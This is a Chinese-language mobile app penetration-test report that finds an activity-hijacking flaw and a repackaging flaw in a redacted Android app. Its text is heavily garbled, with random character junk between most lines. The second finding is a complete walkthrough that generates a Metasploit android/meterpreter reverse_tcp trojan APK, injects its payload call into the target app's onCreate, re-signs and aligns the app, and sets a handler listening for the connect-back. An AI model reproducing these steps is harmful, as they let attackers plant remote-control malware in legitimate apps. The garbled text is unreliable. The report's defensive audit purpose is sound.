+ }) s( Q, l; s& ]$ f2 j$ T
5 a& F3 H f. z5 d- b2 J 1 v' m' Z1 q) r: f- }) S
; f c% P* L6 S% ` _+ ^
7 W1 F* `1 W" s( m
0 _9 h3 m) f3 x0 R) W5 ~2 h
+ ~) k5 c0 ^& V( H `- z2 D( C5 _3 d% A) |0 G
2 检测结果
6 W: g8 Z/ ?4 o& w
7 m$ g$ `4 J2 y% p; x5 ]2 x$ S# {* o
( r! y& P& Q7 m8 N1 Y* g* X O7 c1 Q4 O3 W' Y" V9 N) y" ?
; D5 |' D' T2 \ i t5 n
" [8 ?, u4 b) ^ ?1 D1 q. r6 L# ` 2.1 某某某
* A2 n1 }. k' _" F5 V/ C: S u
- G; _$ G6 G+ T3 x! e6 f4 j) S
* i+ w1 X0 Y9 i- P$ q" i' W7 T2 n$ Z/ N0 B
7 J9 Z6 d H5 T! f x. u% {" X
& M% B" h( Z6 s 2.1.1检测目标 * S1 m5 _8 W' |. x4 T- l
- ?! T2 C' l* T3 J$ r
2 P: u# f8 K7 T
9 H" ?4 e) H: V) j $ K) n( r' N+ g
& [7 m, R9 }/ a" }) x+ }6 `" b1 G2 n 目标地址: 某某某某某某APP " H/ X5 V3 O& Z) u* i) Z
4 }3 Z7 q) c/ U. i! o+ X3 D
$ W/ s; Q& s. N: R" Z
3 M7 }7 I* l% L: j& _2 H& `
5 C4 h% l5 | u& |' R& }( W5 Y2 C+ e+ _1 ] x8 a1 }
2.1.2检测结果 4 h0 H* \9 x6 a" x7 ^, A
8 b' C5 B7 @* U% ~
9 |# F8 K! S- S6 n/ D, t
7 b' p$ D! r6 U) o" B2 M
1 a5 |: C9 ]# K* \/ F l
* {: z( ^5 K- r6 R, ? 2.1.2.1 1 m/ x {4 B6 D. C8 p* ]9 d+ R
0 A: P8 G8 q8 o# k* q0 x0 s
; D! d- f- k# v/ o: D
- P3 G' t2 C2 ?4 H* |: A
D c" f! J0 |9 ]) |0 b/ Q: y; Z$ o$ ], U3 A; o
漏洞链接地址:某某某某某某APP ' A# Q7 ~" n5 w( e
) L* O4 c6 s) ?, j" j
& }, ^+ M3 s. _+ y3 a
k9 Q; Y |5 G) ^5 i
8 A0 ?% B8 p7 V/ t- J
: p0 W5 J: t7 g/ N! U( R" L5 G
$ `; e2 ?6 F6 w6 H6 n) i% l) ?" s' P8 o4 d$ Y$ A! M z6 @" G0 J
: x3 Y! L& C3 g/ U6 b8 h b/ O1 j9 L$ k0 r% }
/ ~" X" O1 k3 }/ ~4 [8 P" X0 @3 o# V! g2 a; U4 ]
漏洞分析及取证: & s4 x; L: U7 \8 l# b3 z% S; \( a
5 C X2 R# }# r2 _8 N* B0 D
8 y, r0 `8 K+ I! \. Y3 m' s# V7 m
5 q* U1 H$ j& i R* } 5 H5 K, p- L3 s% d% f
6 S( V" o, W5 r' q& J2 U
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: , R v- ], m- N* \0 v2 X2 Z
5 P. `. O% p, [$ N$ _2 Q0 }( ~
: B6 P+ p9 {; C7 Q) q$ e, D+ H. \" u H
, }; ^3 p' E1 n# P' {& ?0 |5 f9 h% V/ y3 R+ S o6 ]
2 w0 Q0 O& s4 U" n: T; V7 j$ M2 J3 ]) Y# k0 T
% ?# |: `5 P( U7 v8 s8 W) [* N- [6 }' Y1 y4 H2 F* b/ Z! d
: T* J* _1 N8 F. I% b& L9 H
4 l w' \% _3 ^8 a( r' I # n* r+ V; z l1 B2 m) b
! L, z4 b, T7 b
: @9 w; {( u$ [& K* C
3 ]% G+ x7 A+ @. F& ~( h9 Y; ?
% C! M, n$ z/ `
! x% q! E2 a9 u, L
5 W/ T: k# v8 q# D' d" V1 H/ _
0 w6 W/ ^: l) ^! g) L) o S
. \+ u2 C: [8 P/ r' t
" Q- M( j. V) Y V! F , L, z! }$ h0 t) c4 N: ~
" L; V6 O3 n, E* ~) }
% i' Q; i9 D8 P0 [# z' |% K8 y( t1 K. I0 A
9 ?+ ~5 Q/ ]; O7 o% |
3 o' Q. A% c! [/ T$ v9 M2 r' e: l+ Z6 H
! [: e, }5 f! `# b% c% k& E* M
, ~2 V5 D. r% h" ], E' e5 g: C4 C2 k9 R! s+ d4 b
0 E5 R" x. D( I+ c/ K5 } C3 Q. m% f4 f
( b4 g! Y/ y7 T: N
7 h! x" X7 V5 t2 J* ?* }* h3 [* I
8 w: W' Q5 Q" y- _( D; d
! S$ T3 F7 O3 z4 Y4 Z# b2 ` 漏洞危害:高
$ q% m/ }: E* r+ u0 o6 h0 a0 o( _; |$ x8 X) _
6 @8 ]. x/ p+ F6 S% o* o- ]/ e+ g. R2 ~4 `. ^" E( e8 U
& y4 v& p' j a! _' e1 m" C8 @2 F9 ~1 W8 _( p) w$ y5 N9 E
& h7 s, `- v1 a5 a8 ~/ P4 O' V* D$ }: h z
) h1 c+ {% Y+ i( J2 u) _$ X. L; [7 n
/ S0 R1 @; z T
: c e5 T! P8 I6 D0 M0 }
$ x7 v; j9 D+ @% B/ X* f( m
' l6 q7 B2 X/ R1 h% v7 M* z \: C( A- E; }
3 M! s$ C0 |4 c. Z4 T) w4 m. H/ d# X3 K6 s3 D
严重程度 ) r( Q& y# A( k! w" h1 Z$ E
* i! `' k0 E( M, ?8 S& ?% h) c: r # i k: n! S7 m# x) _0 s
* D; ~" S1 Q+ I; x$ n$ Z3 E x; ~ |
5 `+ E7 s# I; e# G8 L- V5 f+ H `, t( _, _' @% y" I. p& t
7 h7 x/ ?: `7 h, O8 f- y
8 K! Q8 ]6 d- m5 g
! Q& i" I# i5 H
+ G# s! p+ H6 Y- g, o9 A 高
$ a- r2 e- U) G$ Y% Z" w
- P) H' l* `$ N, N( A1 b 4 l' Y! b( ]/ V
" d' ?' i6 m: Q8 ^+ u+ r' ?
| ) w$ \; r5 D ^7 y( y' I5 o+ A
) r" N* `! a$ \+ Y5 }
5 O6 V, l3 a3 f) n6 I+ W
( R" n% l5 Q5 Y$ Z' }# v( h" {8 q3 n
% ]! V1 v1 b# N G* R
5 c2 g, C" [+ b) g# M* p8 a2 T ■ $ V# e& O7 ? g7 w _
+ ~4 w9 M6 n1 a9 a$ M
5 D; d' W8 p8 U1 O. X5 _5 v [8 q+ d0 S5 X
|
- v# l1 u, C1 c$ \4 H: H$ l% v6 V; Y6 V) N+ v& V$ H. m
. p* a9 g% L+ e: ^ S2 G
i6 J m6 U0 [: J. C! s
% u& u6 x. {( y* ~9 \3 {, b" O- F- B! c
中
: r+ J, Y) s, _- Z& l, y
. P! i( T1 }# v) e
7 }2 v" e+ y0 }2 N
& Z8 g( X# u B K& U+ Y% h, g |
+ d# j& Z$ d3 X4 p3 B n% C @
$ Q }/ e6 s$ A/ i) H3 \
: ]% u P6 _& ^ P5 E
3 h: t) i9 I E/ }- P/ n6 i
+ ]( {' e4 p' w5 D8 j( T' \6 L0 j e* p1 Q
9 W" {4 Z1 r0 o( M( R- A7 W0 i; \
0 O' k5 \/ k6 O. K, L
" U. \- J+ X2 A0 J! s `
1 v- j, u, r! |1 b! A | : S. @- | k* l+ y) X
" J+ o; q. u9 w$ {0 ]% r5 a
1 ] [: k( F; N: K3 m( v) e3 L7 G8 f
) R7 a, z5 l# a. d
; m) k/ l2 m/ ^" K7 U 低 . D# U$ J/ [5 A4 `
( d6 K% I8 |# K+ \& c8 {
# I1 w8 ^6 R3 s9 J9 }0 B
& f+ e2 A% b8 L& g, ?, u" n | ( u% T& l: _. v/ ^0 i7 C9 q! j
* H8 V0 |1 a; Y3 _% G
- }2 a1 ]6 _3 Q
9 s4 _) |. L. d0 ?8 U6 l5 \ " Y% _9 g2 I( J. g: A
5 p6 H0 q+ ?; ?0 ]' d, h 5 M$ z8 U$ \$ B9 @3 w" f
6 s( D1 c# Z+ ]1 a Q- `
' `) X4 i: h% t% l: E( ]
I5 u3 n) A+ o3 t |
7 \7 I6 ^. q' ]) c( ]& e; Q5 r3 U, U* u9 N5 p0 x7 t
0 ]& ] r# l# Z6 n* m0 b& z. ^5 G4 M, o3 L
' T$ s5 x7 e" h# v/ x) q% ?
$ i" A7 @$ j8 ^* u" O0 P: S
$ i6 G0 H8 U$ Y; B5 s, u. k4 U4 Y% {; K y" @) x
( u7 k3 _6 {4 l9 x5 |
3 t. K* K& f& U3 ]2 l
% G! F" E5 W! Z, K. I5 \# I1 Q: H0 x* K
, _' e- r I2 p' l9 k( i& ^# Q
/ B3 Z: E+ k5 Z+ W1 n9 |5 n f1 D+ f; m
* B8 o5 N G+ v
" J$ Z3 J$ D* f! G3 m
& s2 F9 z% h5 M& E- \0 |# @* d
3 C( l& Z# @. k 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 # F8 ^& A) E( ?; M
' x' _5 d" r9 x/ K
4 p/ o+ _- l9 t4 \5 B
2 h) T9 c* m& Y7 M+ Z% h
+ V" n" d8 X) P( q" S$ M; Y+ O; _4 o) L% ?- B) n- R
& ?9 M: g) O9 `- P: y) w& n" _
9 ?0 ~# {# {5 \8 L: G" d/ `9 e
3 j4 J: @ e# t8 p3 U/ h/ O
/ r) N& N6 V# i3 p* f6 _/ @2 Z6 K
% r2 o* u" \; z, K, }+ m$ m
9 c# _9 x" y# {: G
3 S* l/ B* C, m9 w0 e! R
?/ h5 i1 t" d" M, B" \8 [
5 f _1 k& q: `: e) y
$ r) o! H8 E; L$ q% d ~0 U
" G; u0 F: m. E$ e) q$ o# ]7 S( _, U) L6 V% I! M/ ]
2.1.2.2 0 A9 `/ W0 {# {) {
7 \( k/ y1 b4 L' t' E# l. `# W9 ~; v
. L7 R: X a5 o M5 ?) z) Y+ e
' s# i! I- L- x$ [* d. p4 i% [
" E( c; m% R# _9 {$ t' g) [$ J
漏洞链接地址:某某某某某某APP
' K1 Q# ]8 u# t8 e# Z& e! k* I9 A3 E. E! i" i( \$ F3 y% s u
( C4 c" S& Y. h3 @) A1 A0 [2 h0 F. B! s2 |% @
; y. p3 _# C1 z* n. k1 `. Y! N
# ~/ J& g/ x" k, [7 M 漏洞分析及取证: " U+ L8 E C4 _: V; ~# n
: T6 k: N, X9 G$ r
. z# x9 g2 {* R9 N% w4 e) c
, T' x/ M, C" {
9 W. U& Y4 \9 h+ p' n
4 R8 [2 z! I! k7 q) J7 A4 X6 R 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 9 j" t4 l# Y4 I
9 o8 d: |3 E1 e; R! i& z N
- ^2 F7 Q; X6 [7 J9 z7 n5 m& \, N+ t; F4 D Y% h: L
6 f$ d6 K+ A$ Q, K) A. m5 @; S) j8 D. G) q. n
用Metasploit 生成木马 apk % V1 e9 k( D7 i4 U
. B2 _; S; [: w$ H2 c
! E R; l' t; @$ M- f
" z* ^! J* i5 d, V( M9 u; Y! h5 M
! V$ ]# ?7 X/ r
: F8 z* U% H& Y9 `; T5 A* c
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
" q" R. L( Q* Y/ T, u" X6 ?9 C+ J& M4 W( K! u2 L
u/ N' m# \" _2 F2 g: u
; D0 z: k3 [+ o! p
1 w/ @! O8 X% z0 [) q6 G+ w( Y, ^) d# I% g4 D! e
反编译目标apk和木马apk ' X6 F# _5 i" K! n* g
6 l1 f' V; P2 R" j2 J, {
+ N# w$ ~7 O. H) n1 j' ^4 R" ]$ t6 p! @6 L/ J0 ?3 G
3 h0 L, ?! O7 L( z4 \) Y. ?; {% B- i8 g" T. X5 H6 L) s$ H
apktool d target.apk
/ ^. \8 z( M$ S/ p9 s& `
6 L5 |4 W- I( n0 a6 e S- X8 E8 H$ s apktool d cockhorse.apk
" Q/ D% E6 L1 J* n& h7 q4 w! n/ S5 f& o6 l) I$ z
. ?) L6 x! e6 N u! s* s3 c; S- V& r9 q' V
: w7 d: m0 i. y$ T
/ M# L- J |! w9 w. q7 ~ d# } 木马 apk 注入目标 apk
) K: A9 b7 P# A# n8 Y4 j0 Y6 q# n* e8 L) N: P6 o
8 U3 S4 c$ U) A6 n. i! a- Y/ z5 C& {
& Y/ y. D1 A. t; f
) E# ^0 |3 w8 T; O& |$ k# G
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
1 d k9 \( a" W. M! y( ~
% G9 i) _* h& @; G
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
K }' g8 s9 |: Y1 S5 k) |+ ]
Y. s- T/ {6 c6 z
O- y. C! p) j4 M# p
" ~$ _9 W& l% A! P K
! m: _7 R* G0 ^# c6 g# I r
K1 E8 B: t' Y' m
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' A& ^6 |0 I" j3 S
3 M: _% \, J0 ?3 c
( v! }' U8 A5 |0 K1 A+ J
b/ ^6 }% ^7 G' v4 G- Q . M1 o( T2 T" M w. ^% t2 T
$ g5 x9 l& b$ y
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 . ^, Y% ?" s# o9 D0 o
4 n" ~+ G( H9 D' Y( D
9 Q; h! e* ?2 o/ k8 p1 |
6 t8 \! R; e% _: g) p
- X" {6 R7 |9 b; c! b! [
7 ^1 |3 d8 T9 i8 f o' @5 H8 q/ P; \ 回编译生成最终 apk 2 J" p& M) N2 v/ z! H2 t5 @6 T
: O$ Y, [$ F" q- z5 Q
/ A" j4 D) B( @( ?, M3 N
2 M B# _: b) y U! v3 y
3 X7 i: R, y1 c
6 H! |( N! D% y% `+ H1 w2 w8 L 重新打包 & [ C" I2 Y- x8 @2 r
1 V2 z' ^; b& Y2 |' s; w/ i5 [ ^
3 s& |) `- F- O. q# b: q3 P1 B$ }; P' z6 z4 [" x# J U' Z
% r- a3 U B- u2 V# o, n1 `9 S
' L: l( q+ u# B9 ? apktool b -o repackage.apk target_app_floder ~0 n8 X2 D c
. e5 q* [( A4 H, K& p9 \
9 ?) c. \ b, [. P/ c: I7 ~) `, w% K& U/ @3 ]9 p- x
2 P! P! Y! y1 G. N* a. K! T" N3 H
创建签名文件,有的话可忽略此步骤
; v& ?; ?+ H, ~4 F. @5 I6 _1 N7 p
" }) w$ H2 d* K L, o- w
+ @) @8 P9 u0 F+ }' r( C v
7 x. a, x0 m' h; v9 n2 m! W
: z, ^ ?. N) t
- O( o2 J. g8 q
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 9 P+ Q# T$ n9 R# _
3 \( X* O0 Z4 B: j: o# r, s9 c5 C
) a$ b) C7 y( V" t, ]; S. W+ E/ D
+ R8 V: i2 M E5 ? & t9 n5 H+ h% \( g2 e
4 L, j& W) K. R0 g |( @" i 签名,以下任选其一 7 n0 Z& a2 ^9 f$ K3 d
. q) }* V0 z% [
+ N% E5 P& n9 C* i
& m$ a+ Y7 c+ L7 D; H& t % K1 n' P2 g; A2 G9 |9 `
w! W# ?; G# Z% G' S+ N
jarsigner 方式 4 b; ]. _: b- \( D) b7 M2 r
: m8 D2 k3 s t9 z
* R% ?* V0 O1 y5 k* H3 L, j4 _8 t5 \# U Y# H; y; s
5 F' Y' P" ^9 e8 c4 W: Y2 r4 g( \
1 D, F2 f) p. A4 Q& v! h jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
5 o& D4 e* `5 T& e% E
! g" Y) }2 \6 M+ i* j
- s$ K$ W* }9 n
9 ?- c) @9 F$ C9 R1 Q
! X$ ]( C* T8 z
& g; d5 m* s5 D apksigner 方式 2 L. \# M U7 J- e- i/ Q
) A; w, G$ T: O1 H
, V. U( M& n/ N* w8 P& i
- h4 T! n+ _5 J) R
3 e( \/ @# w5 N, G0 T4 q V- W; E
' _& G. U9 D( G4 ~7 M- T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 }2 W, }' ]" t# p: L! h j+ [
8 l: s1 l$ ] ?+ z4 c1 I
. J) ^6 p. H) K8 o* z3 X5 I% S! K
- S c+ [/ K; l! }& N$ S
" P& y( u" {) P; j9 y5 X2 A* P1 t9 _
如需要禁用 v2签名 添加选项--v2-signing-enabled false
! o% m$ x/ G: n" p6 J
8 C5 ^9 M6 Z8 B, v5 ?$ J# Y
0 w! M: O c# i, w3 N/ o x
6 d, p% Z3 y) ]. H
2 L5 F% D; ] ^- ]; C) b& I$ n" F+ K5 p
4 r) H( }7 C& S% C 验证,以下任选其一
4 _ `! P# Q& w; F7 ?6 ]: U7 C
1 e- x; A0 x* a8 t) j9 h
. [8 B4 a2 p4 m! i, }
- |: w$ k5 c0 A
: M8 V2 \1 Y4 m$ m0 m* ]2 W: S
9 v/ a8 ^1 e M# D jarsigner方式 : x% S- O% a- r" H5 L$ U# ]
0 s: I- K6 |5 E
9 j! m- n9 r* j; i1 {8 X/ g, D/ a0 H9 ]/ b. H$ {6 z( n
) L" T8 N, p8 K4 n: q8 B( S8 Q
& J3 J* P2 I2 b jarsigner -verify repackaged.apk 6 _' Z' _( ]8 Z: n- D8 d
( m: X+ \) s7 W' K
% T9 B) k/ ^4 I: c A+ x% R5 h3 N* q Q6 m# L: E, F
6 h* N/ }& g4 H G, }
1 o$ `; d) m4 _, Y apksigner 方式 # G4 J0 v3 [' o& @. I" @! d
, [& h: q# s1 v; w# N
% l3 O' q5 B/ m2 M7 F
& |- J6 d# N+ N6 f" p: D& t0 ]
2 n# X$ a# S& u8 z
, R( I7 m+ P' ` e" b apksigner verify -v --print-certs repackaged.apk 4 g, W+ h5 {: n |2 N: E* _& \7 y
; e) ^& F' T( }% \8 B3 F) p
- Z$ s8 W T% w$ L: t& x7 P0 v
1 }4 K! Z1 Y! [
& E8 l0 I3 Q8 i
* ~; G* c+ P3 O9 l
keytool方式 % ]) O. m: D3 U$ q/ u5 O# e* k) ?
0 A& p( |" g% ~; n5 ~+ l
7 g( w. H( C3 u
! [1 b7 ?9 F9 m. d9 ?3 ~ [( i
1 _4 _, k! U9 j4 f a4 |. C# g+ h0 q! g
keytool -printcert -jarfile repackaged.apk
9 w! J( J: b5 |5 y4 X8 ]/ l
, K$ ~. F& P7 W) L \+ }0 _2 Q
5 ^) K* c0 B" p# Z
+ t6 D% [& L$ I5 [9 h
9 L( f% n8 l# m* D# }( s
8 ]: H" h1 |- u) S 对齐
& ~5 d) }; ~. c, G
# F% I, }; F% q1 @8 ~5 }& x. ~! l
! e) c" W- v% }4 ?* r3 G% t6 _5 U# S; j, }0 `- ^
$ @. R% ^$ A$ g* e. q4 F$ F* x# K/ P s7 l H( s2 h2 a W6 M% D% L* p
字节对齐优化 ) U7 _; V' P/ `/ l3 \" P8 k
; H3 R! y+ D1 m6 C3 i
5 E6 g* z7 @: x8 M, D- G* o
9 H& I# |- {% X4 {/ o- z 9 {* H4 Q) p1 R1 G$ E* `
0 r6 D8 E1 }9 ?* k zipalign -v 4 repackaged.apk final.apk
9 x& ]( \3 N n3 m7 m- v7 j$ j3 B0 A7 g& G! z
/ F* V5 V$ [! J' K1 w1 X7 Y& j
. P) N2 z8 ]6 a8 x1 V, I ) m0 B# e4 }& @3 |! e3 l- A9 P- g
- s/ F* H0 A, o( n5 Z& Q9 d 检查是否对齐 " H$ h3 r; r: F) o
$ b" d' q. J- o# O; V9 n
! H P9 N0 t8 c* k: k, r
4 `$ T" E. K% M7 C, K" q' e
. q) X' l' j8 R5 Q6 l! M0 d5 B3 V. r$ N3 V& N( v6 p! O
zipalign -c -v 4 final.apk . J& o4 Q* V' b" F+ C9 i9 j
6 _2 {+ F4 ?8 F5 T
9 I) y I; V5 ?. H" E! u
Y+ q1 z) o" N5 e; c ; ~8 z+ p" J$ V( w
( W" w2 a9 b& [: ]5 p
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 5 O. i/ n$ c2 y1 o# D8 h
! F+ _8 T3 E: i* e/ f. s7 d
1 K0 Y% b; l$ ?% n
* u! @5 r* I3 L6 K7 z8 }
5 e& r# {$ h3 B+ C+ C: }0 a- r) p. C: m- K* O3 K7 e
启动Metasploit控制台,配置参数等待上线
1 Z& Y' b" F5 f V$ [& C# u8 z4 z. \1 A! z; e7 f' _
' V: W& C( q% O Q1 k$ D8 n# T
- Z4 p6 g4 V6 W' u
@9 j: B/ N$ E+ `. H, m2 m: A8 W
在终端依次输入如下命令 2 T9 g$ Q* j2 ?, X* e
# X0 ^( P. ]5 J( u& |$ ^% C% J/ B" v
2 T% {$ T4 b, g0 v
: h% n4 N- |- w% _
6 G$ ^+ D% p$ {: O( S9 t2 N) F) m
msfconsole , t4 z, S* X7 R* ~
7 I2 j1 K) O. b+ \9 Z- n
) V- j2 \- J9 i' d% G
+ t( ]3 m) j: d1 ] |
2 ]2 u5 t+ F9 m L
: W/ Z. }6 [& W# D T' c use exploit/multi/handler
. i- N! w2 ~, Y- h1 X( z
, m+ Y# E w) S# B' k# v
( S6 L2 y1 s6 d3 I: v) U: F5 ]
8 r1 R7 O5 {/ X# s6 T6 |5 s , n/ o: Z" z1 b1 q. A4 l2 ?5 ?- J: |$ \
4 D% |/ K" H! C7 ]' O5 s
set PAYLOAD android/meterpreter/reverse_tcp
' u$ D5 o. @- x, t& G! K9 X- ?0 T* @8 Z4 h% y
* ~' O9 ` {5 z7 Z
- O6 `* N1 r5 N5 g
% p$ B5 N: \: V# q. M
9 ]. A$ m9 H# R; p% s set LHOST 192.xxx.xx.xx $ J! O" ]; } h( {, j. _) K/ B V
" E# q' }/ Y: R% l1 a
& o7 M' \0 s3 j0 T( P8 {1 I8 q
6 U$ V- q% N- V; u& j; i
2 l5 E. E- t- k# K
, _ {0 V4 L! ^( ` set LPORT 4444 - t, W" h. j0 W# {5 S/ s
7 {; {) |9 R# b& i; \
: t8 r- |9 U* R3 l4 d+ b+ j- U' F6 ^- J" s+ U
: i2 _1 e7 f; P1 q3 A* d7 u0 \
* I6 a% o/ D- P/ h* o, u* N& q
exploit ) o& O! y+ H% C7 _; M0 a2 @) b/ m7 r
4 z" P, A1 t, b) y
* \7 M# @. R4 i* d6 H- t% b. R6 ^$ i* i
6 `5 b6 g6 r1 q" Z0 b
" y/ X% u6 K2 F; m 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
8 G% l* _+ O" K3 N9 S1 ^0 M, x- E/ R/ q. A
/ W1 D E" Y1 S; t' y3 c- @% B
5 j+ r3 Q3 T" n1 e) a! g8 u _ % L+ p" f0 j; Y. [7 F
' m! W$ o" U6 ?/ h% C0 M2 y 漏洞危害:中
3 f' ?* S; q O, c, Z# K
, n" p$ y9 } c0 i) H6 Y
! u( O2 u. i) ]0 z
, [; b+ U9 H# x a) { B
" m! I/ ?6 V% o3 k. @: }+ }! k7 X4 h' N( C9 J0 m# t2 R
- ?5 y7 r% t' V1 a! z
8 S T" `2 Q# E6 a' D' Q! b5 I
, [) | M: m' L; ^8 X/ H0 P* P
0 G1 ~4 l8 ?. @2 E) V2 t
! i1 ~/ P5 w3 m3 v3 Y: @7 O( D, b. q6 |- f- ]! I
$ i8 e' i. h: @6 w) J Y6 a1 j
6 v2 o4 f o+ r! x" O
/ r9 i i+ }6 X, Q+ W4 V
1 j+ o& Z! z- @: y- o. y5 _
1 E0 g1 }/ D9 W x5 v8 w9 d3 T: H1 G- Q9 l
严重程度
. s; d, @6 }1 R, t: G: G
! y e! ]3 I' K" Y- \
' E8 H8 o: {: Z6 E7 b
N# \2 h- a& T/ K i6 ^ | 6 c. m) K; u6 a6 }/ A3 Z+ @9 m
2 T) k9 [4 e5 K5 `* D
' U$ s" J9 b. W' y4 g! P: A3 C7 l/ d, c9 D$ q
! X- z/ U3 Y L/ i5 R. w( z8 z
7 l; b6 G) f! L3 d5 M; L 高 " P ^' n0 ^0 O( L+ x4 b8 E9 E; Y
7 f3 _1 g& P" Z/ q
0 V: Q: m9 D x! N. `' L
" `2 @; @4 |+ s2 o& \- T |
4 D" P6 q1 t6 |7 S0 K) t. o" D& B, b" ~
, ]8 L# k# z$ x6 z
5 z; O* Q5 H# ]& v8 @5 h 3 P" t" I' t, K3 F
6 W. e& O' ]3 y/ n! J" J
■ # R1 Y& t. K' p0 O0 o7 A9 c+ J8 b$ H
$ Y. b \9 @- C2 c; I9 F
) R# n. S3 q& X: p V$ r$ C; x" V* O: C& L% [* j. X4 M
|
1 n P. `, a/ o# D! w: L, o* s1 e1 q0 M: i) n: M
, R3 g$ P7 F$ ]# z
# i5 m( d* J' l9 H( L
2 i) R E8 ]3 ~" s
4 ~ N) \, W: m Q$ Y8 R- m" L8 ?0 G
中
2 ]3 F# e) `! q3 D
( `1 ^1 _5 I7 G- ~0 F / E/ l B' m, n' ^. z) `
: X; P" Z) `/ i5 K
| 5 V8 F' |2 _! S9 [, h$ y) k
2 o3 k, `1 Q4 o/ }
" a" u0 E. s. \7 S S3 i' m& ~! X% e6 E# a
' e) Y' e$ e* \( o
0 |/ n# K% v7 P, |/ q$ ?* i
4 o1 k: h7 k& v, @1 a1 `: [7 N% O: S* D. P- ^7 u
$ F: D1 l( u# w$ [
e3 ?7 e4 x8 k) u( r + [# y5 x7 \/ V2 b) c
+ D: N6 S0 A% e& {% b: ~: f' q
|
9 G1 w( g* ]" o% u. L# {- m8 B5 I9 N# d2 {9 ~% K) W" V" Z
8 |/ k, y. t. Q) t% t
7 b, e1 o3 f1 K3 ]3 c% v: U8 ]
3 X3 V% ^5 ?* {" w" R7 v
5 G- L- o1 P# B7 O. |% r9 m 低 ! O4 L. p9 O$ J$ D1 L# v$ y
, j' \& [* q9 ~, U& N' L
% X4 \, o% z" C3 a+ ? j
( w) w& s* p* `" s1 h
| % Z6 j$ V* a/ D& ^ k5 e
, ^' _$ `1 d% \% a) Z
: _; x; g6 h( v. e! f2 @0 q* |. E. I- e- g4 ]7 n2 o
: h5 h' w1 s( }, E# j9 u" @5 r8 W, _- S
$ ~, {' f5 s* W' x6 \2 }. y
. R$ s4 G/ X! ]& ?) x3 q
3 t5 \% [9 G. p1 e. ]( D; r8 ?0 L" o: Y; l ]/ E
3 m6 N& d, Y `+ x5 n
! `9 e( i Q& ~) B | 8 t% g [+ }6 z. Q8 T
0 o" Z8 Q& }9 }' `8 c/ a/ M$ m
& ?. u6 K* j2 S' w/ Z4 E2 D
7 O( y- [4 D( t& ?1 O" S 4 e" {/ W0 R5 O4 @8 d; l+ K# e$ u
: j8 Q |8 b& @: n( z* ~9 V
- H1 k) v* U$ ]$ U, f
# n0 v; q1 T r5 e
( S4 P! u, e( ?3 a
3 L$ r. u# ?- z' r) u
; G. B, ~7 P( b
" [* k4 r- o; b9 W% V 8 h- L1 f) k7 T! d- {. b
3 U4 G* i" n2 S- b; Q
0 D8 H# x8 L q- A8 S+ g. B. E1 d4 i# C }- f/ X4 w: h
8 L2 l0 ?, ~6 e" M
9 n1 Q3 o5 h3 Q9 m! {. J2 M4 D0 Q 修复方法: $ X3 ^2 }/ z; C1 Z
- M& m" S5 K5 u* B. d, b; s4 J
+ H8 r' r, @( G+ n* ]% w ]
7 d* H/ a1 J- s
9 R0 m( p3 }; z+ g' ~' p' A
6 i& v4 y5 l6 W1 c4 w 1.在 APP 启动时应做签名校验防止二次打包。
+ w$ J" F" u) C
! m( g3 |; N2 q0 D1 H% | 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
4 ?: l Z0 {, Y) {7 d) q# I0 i% L4 i
* N6 r) V+ c* a9 u9 C4 D+ t) X }! h. [) B, z/ k& Y
) y' b& s5 I# e6 A5 c; {
. f1 G+ d6 x1 o
) o; e" m I! e: ?# `! n9 c" ~7 d* R* q h9 A8 b
! { y0 ?9 e% x- I5 d$ R
. o f2 a% I% D! S4 N( w* U T
( o( n9 H: d$ v9 z& X _
2 X, u3 H# L- T, t8 c/ c1 u
4 A0 K, |( E$ s. s6 `$ z) ?4 k# B5 x2 S$ o3 v, B1 N
0 g A4 c4 V- h* L! [5 V
! i. L6 c& H+ w$ @" O T' L! Z
# Z4 b4 |' E X& S0 y! A8 F/ X" x
8 ?4 U" v6 |4 d1 k7 w4 f7 @
$ u! x+ A0 K, ^( [( @. @9 w- p! J8 c3 e, R